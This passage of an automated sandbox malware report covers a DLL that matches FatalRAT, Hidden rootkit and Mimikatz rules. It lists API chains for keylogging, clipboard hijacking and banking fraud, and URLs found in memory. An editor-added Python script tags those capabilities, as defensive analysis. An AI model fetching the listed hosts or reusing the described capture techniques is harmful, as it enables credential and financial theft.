Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10014060 InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,#823,HttpQueryInfoA,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strstr,strstr,#825,strstr,strncpy,strstr,#825,strstr,strncat,strstr,#825,InternetOpenA,InternetConnectA,InternetCloseHandle,sprintf,sprintf,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,sprintf,HttpSendRequestA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,atol,#823,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,MultiByteToWideChar,#823,MultiByteToWideChar,#825,WideCharToMultiByte,#823,WideCharToMultiByte,#825,strstr,#825,#825,0_2_10014060
Source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: http://ptlogin2.qun.qq.com%s
Source: loaddll32.exe, rundll32.exe | String found in binary or memory: http://ptlogin2.qun.qq.com%sAccept-Language:
Source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: http://qun.qq.com%s
Source: loaddll32.exe, rundll32.exe | String found in binary or memory: http://qun.qq.com%sAccept-Language:
Source: loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
Source: loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt
Source: loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://
Source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: https://localhost.ptlogin2.qq.com:4301%s
Source: loaddll32.exe, rundll32.exe | String found in binary or memory: https://localhost.ptlogin2.qq.com:4301%sAccept-Language:
Source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: https://ssl.ptlogin2.qq.com%s
Source: loaddll32.exe, rundll32.exe | String found in binary or memory: https://ssl.ptlogin2.qq.com%sAccept-Language:
Source: rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | String found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\loaddll32.exe | Code function: <BackSpace> | 0_2_1000B840
Source: C:\Windows\System32\loaddll32.exe | Code function: <Enter> | 0_2_1000B840
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: <BackSpace> | 3_2_1000B840
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: <Enter> | 3_2_1000B840
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100025B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,0_2_100025B0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,0_2_100026B0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,0_2_10002770
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_100029D0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,0_2_10017BB0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100026B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,3_2_100026B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,3_2_10002770
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_100029D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,3_2_10017BB0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000B840 GetKeyState,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcatA,lstrlenA,lstrcatA,lstrcatA,0_2_1000B840
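The API chains in this section and in the file-enumeration entries above are the evidence behind signatures such as "Contains functionality to capture and log keystrokes", "Contains functionality to modify clipboard data" and "Contains functionality to create new users". The following is an added example by the editor, not Joe Sandbox tooling: it parses four evidence lines copied from this report into API sequences and derives capability tags from which APIs appear and in what order. The tag heuristics are the editor's own and are assumptions, not the sandbox's signature logic.

```python
"""
Turn "Code function" evidence lines into capability tags. Added example, not
Joe Sandbox tooling. The evidence lines are copied from this report; the tagging
heuristics (which API combinations imply which capability) are the editor's own.
"""
import re

# Evidence lines as printed in the report: "<id> <api>,<api>,...,<id>"
EVIDENCE = [
    "0_2_1000B840 GetKeyState,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcatA,lstrlenA,lstrcatA,lstrcatA,0_2_1000B840",
    "0_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,0_2_10002770",
    "0_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_100092A0",
    "0_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,0_2_100254C0",
]

# id, then the API list, then the same id repeated at the end of the line
FUNC_RE = re.compile(r"^(\d+_\d+_[0-9A-Fa-f]+)\s+(.*?),?\1$")

def parse_evidence(line):
    """Return (function id, [api, ...]) for one evidence line, or None if it does not parse."""
    m = FUNC_RE.match(line.strip())
    if not m:
        return None
    fid, body = m.group(1), m.group(2)
    return fid, [a for a in body.split(",") if a]

def ordered(apis, *seq):
    """True if every API in seq occurs in apis in that relative order."""
    pos = 0
    for want in seq:
        try:
            pos = apis.index(want, pos) + 1
        except ValueError:
            return False
    return True

def capabilities(apis):
    """Heuristic capability tags for one function's API sequence (editor's assumptions)."""
    tags = set()
    # polling key state and appending to a string buffer: keystroke logging
    if ("GetAsyncKeyState" in apis or "GetKeyState" in apis) and "lstrcatA" in apis:
        tags.add("keylogging")
    # read the clipboard, empty it, then set new content: clipboard replacement
    if ordered(apis, "GetClipboardData", "EmptyClipboard", "SetClipboardData"):
        tags.add("clipboard-replace")
    elif "GetClipboardData" in apis:
        tags.add("clipboard-read")
    # walk a directory deleting entries, then remove the directory: recursive delete
    if ordered(apis, "FindFirstFileA", "DeleteFileA", "RemoveDirectoryA"):
        tags.add("recursive-delete")
    if "NetUserEnum" in apis:
        tags.add("local-account-enumeration")
    return tags

def tag_report(lines):
    """Map function id -> sorted capability tags for every parseable evidence line."""
    out = {}
    for line in lines:
        parsed = parse_evidence(line)
        if parsed:
            fid, apis = parsed
            out[fid] = sorted(capabilities(apis))
    return out

if __name__ == "__main__":
    for fid, tags in tag_report(EVIDENCE).items():
        print(fid, ", ".join(tags) or "-")
```

The ordering check matters for the clipboard case: reading and then replacing clipboard content in the same function (0_2_10002770) is the pattern of a clipboard hijacker, whereas a read alone would only justify the weaker "clipboard-read" tag.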

E-Banking Fraud

Source: C:\Windows\System32\loaddll32.exe | Code function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe | 0_2_1000BFE0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe | 3_2_1000BFE0

                  System Summary

                  Source: ZfJheGhddq.dll, type: SAMPLE Matched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: ZfJheGhddq.dll, type: SAMPLE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: ZfJheGhddq.dll, type: SAMPLE Matched rule: Detects FatalRAT Author: ditekSHen
                  Source: 0.2.loaddll32.exe.100fbd38.2.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.1010b380.1.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.100fbd38.2.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.1010b380.1.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects FatalRAT Author: ditekSHen
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects FatalRAT Author: ditekSHen
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects FatalRAT Author: ditekSHen
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000E670: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,0_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10010190 AttachConsole,AttachConsole,Sleep,AttachConsole,GetConsoleProcessList,GetConsoleProcessList,#823,GetConsoleProcessList,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,#825,FreeConsole,FreeConsole,Sleep,FreeConsole,TerminateProcess,swprintf,SHDeleteKeyA,OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryA,GetSystemDirectoryA,lstrcatA,lstrcatA,DeleteFileA,DeleteFileA,GetSystemDirectoryA,lstrcatA,DeleteFileA,LocalFree,free,free,free,GetWindowsDirectoryA,GetCurrentProcess,IsWow64Process,DeleteFileA,SetServiceStatus,ExitProcess,0_2_10010190
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10010640 ExitWindowsEx,0_2_10010640
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,0_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10010640 ExitWindowsEx,3_2_10010640
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,3_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10058060 0_2_10058060
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10081090 0_2_10081090
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10097190 0_2_10097190
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100041D0 0_2_100041D0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1003B210 0_2_1003B210
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1002A260 0_2_1002A260
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100932B0 0_2_100932B0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007E2D0 0_2_1007E2D0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1003E470 0_2_1003E470
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100373F0 0_2_100373F0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1003C412 0_2_1003C412
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001A420 0_2_1001A420
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1005B420 0_2_1005B420
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000A580 0_2_1000A580
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007E580 0_2_1007E580
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10096580 0_2_10096580
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100935E0 0_2_100935E0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100945E0 0_2_100945E0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10035697 0_2_10035697
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100287B0 0_2_100287B0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100297D0 0_2_100297D0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1003E490 0_2_1003E490
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100308D0 0_2_100308D0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10059900 0_2_10059900
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10080910 0_2_10080910
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007E960 0_2_1007E960
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10095A10 0_2_10095A10
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1005BAB0 0_2_1005BAB0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007FAF0 0_2_1007FAF0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10081AF0 0_2_10081AF0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10091B30 0_2_10091B30
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1003BB90 0_2_1003BB90
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10082D70 0_2_10082D70
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10059DB0 0_2_10059DB0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10083DB0 0_2_10083DB0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007ADD0 0_2_1007ADD0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10084DD0 0_2_10084DD0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10037E10 0_2_10037E10
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1005AEA0 0_2_1005AEA0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10093F40 0_2_10093F40
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10023F60 0_2_10023F60
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10078F70 0_2_10078F70
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10058060 3_2_10058060
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10081090 3_2_10081090
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10097190 3_2_10097190
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100041D0 3_2_100041D0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1003B210 3_2_1003B210
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002A260 3_2_1002A260
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100932B0 3_2_100932B0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1007E2D0 3_2_1007E2D0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1003E470 3_2_1003E470
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100373F0 3_2_100373F0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1003C412 3_2_1003C412
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001A420 3_2_1001A420
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1005B420 3_2_1005B420
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000A580 3_2_1000A580
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1007E580 3_2_1007E580
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10096580 3_2_10096580
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100935E0 3_2_100935E0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100945E0 3_2_100945E0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10035697 3_2_10035697
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100287B0 3_2_100287B0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100297D0 3_2_100297D0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1003E490 3_2_1003E490
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100308D0 3_2_100308D0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10059900 3_2_10059900
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10080910 3_2_10080910
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1007E960 3_2_1007E960
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10095A10 3_2_10095A10
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1005BAB0 3_2_1005BAB0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1007FAF0 3_2_1007FAF0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10081AF0 3_2_10081AF0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10091B30 3_2_10091B30
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1003BB90 3_2_1003BB90
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10082D70 3_2_10082D70
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10059DB0 3_2_10059DB0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10083DB0 3_2_10083DB0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1007ADD0 3_2_1007ADD0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10084DD0 3_2_10084DD0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10037E10 3_2_10037E10
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1005AEA0 3_2_1005AEA0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10093F40 3_2_10093F40
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10023F60 3_2_10023F60
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10078F70 3_2_10078F70
                  Source: C:\Windows\System32\loaddll32.exe Code function: String function: 1001B690 appears 31 times
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001B690 appears 31 times
                  Source: ZfJheGhddq.dll Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: ZfJheGhddq.dll, type: SAMPLE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: ZfJheGhddq.dll, type: SAMPLE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: ZfJheGhddq.dll, type: SAMPLE Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 0.2.loaddll32.exe.100fbd38.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.1010b380.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.100fbd38.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.1010b380.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
